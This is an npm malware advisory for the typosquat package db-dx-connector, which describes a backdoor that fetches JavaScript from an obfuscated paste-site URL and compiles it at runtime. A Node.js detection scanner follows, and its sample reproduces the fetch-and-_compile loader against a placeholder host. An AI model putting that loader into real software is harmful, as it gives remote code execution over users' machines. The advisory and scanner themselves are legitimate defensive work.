npm

db-dx-connector @1.0.3

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 9:50 PM UTC

Malicious

OSV ID

MAL-2026-5463

Ecosystem

npm

Summary

The package name db-dx-connector inverts the word order of the legitimate dx-db-connector package (whose own GitHub URL github.com/divbloxjs/dx-db-connector is referenced in this package's metadata). It replicates the legitimate package's MySQL-connector API surface and adds an undocumented method queryDBConnect in index.js (lines 226-238) that constitutes a backdoor: a base64-encoded URL stored in a misleadingly named HASH_KEY constant decodes to https://www.jsonkeeper.com/b/ZIAIK (an anonymous, mutable paste-hosting service), the method fetches .data.content from that URL via axios, constructs a synthetic Node module, and calls m._compile(s1, 'error.js') to execute the fetched JavaScript inside the consumer's Node process. Errors are silently swallowed in a try/catch. Whoever controls the paste can ship arbitrary code into any process that calls queryDBConnect(). The combination of name inversion against a real package, base64 URL obfuscation, an anonymous attacker-controlled host, runtime fetch-and-compile of remote JavaScript, and silent error suppression is an unambiguous remote-code-execution backdoor.

Source: amazon-inspector (074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759)
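The fetch-and-compile pattern described in the summary can be flagged statically before a package is installed. The following is an added example, not code from OSV, Amazon Inspector or the package itself: a small Node.js scanner that reports string constants which base64-decode to an http(s) URL and any call to Module.prototype._compile; the sample source it scans and its placeholder URL are constructed here, with only the HASH_KEY and queryDBConnect names taken from the advisory.

```javascript
// Added example (not from the package or OSV): static check for the
// "base64 URL constant + Module._compile" remote-code-loading pattern.
const STRING_LITERAL = /(['"`])([A-Za-z0-9+/=]{16,})\1/g;

// Returns the decoded http(s) URL if `b64` is canonical base64 of one, else null.
function decodesToUrl(b64) {
  if (b64.length % 4 !== 0) return null;
  const decoded = Buffer.from(b64, 'base64').toString('utf8');
  // Round-trip check rejects identifiers that merely look like base64.
  if (Buffer.from(decoded, 'utf8').toString('base64') !== b64) return null;
  return /^https?:\/\/\S+$/.test(decoded) ? decoded : null;
}

// Scans JavaScript source text and returns findings with 1-based line numbers.
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    const lineNo = idx + 1;
    for (const m of line.matchAll(STRING_LITERAL)) {
      const url = decodesToUrl(m[2]);
      if (url) findings.push({ line: lineNo, kind: 'base64-url', detail: url });
    }
    // Module.prototype._compile turns arbitrary text into executable module code.
    if (/\._compile\s*\(/.test(line)) {
      findings.push({ line: lineNo, kind: 'module-compile', detail: line.trim() });
    }
  });
  return findings;
}

// Both indicators together are the shape the advisory describes.
function isSuspicious(source) {
  const kinds = new Set(scanSource(source).map((f) => f.kind));
  return kinds.has('base64-url') && kinds.has('module-compile');
}

// Constructed sample mirroring the advisory's description; the URL is a placeholder.
const PLACEHOLDER_B64 = Buffer.from('https://paste.example.invalid/b/PLACEHOLDER').toString('base64');
const SAMPLE = [
  "const axios = require('axios');",
  "const Module = require('module');",
  `const HASH_KEY = '${PLACEHOLDER_B64}';`,
  'async function queryDBConnect() {',
  '  try {',
  "    const r = await axios.get(Buffer.from(HASH_KEY, 'base64').toString());",
  "    const m = new Module('x'); m._compile(r.data.content, 'error.js');",
  '  } catch (e) {}',
  '}',
].join('\n');

console.log(scanSource(SAMPLE));
```

Run against an extracted package's index.js, this reports the decoded URL and the line of the _compile call so a reviewer can compare the payload host with what the package's documentation claims to contact.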
